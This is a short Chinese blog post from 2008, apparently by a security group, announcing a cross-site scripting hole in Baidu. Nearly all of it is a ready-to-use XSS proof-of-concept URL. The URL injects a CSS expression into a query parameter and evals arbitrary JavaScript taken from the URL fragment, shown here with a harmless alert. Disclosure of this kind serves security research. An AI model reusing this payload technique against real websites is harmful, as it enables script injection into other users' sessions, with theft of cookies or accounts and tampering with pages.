百度最新跨站漏洞

http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%27www.safe3.cn%27%29
测试地址:运行
posted @ 2008-07-10 13:55  有安科技  阅读(248)  评论(0编辑  收藏  举报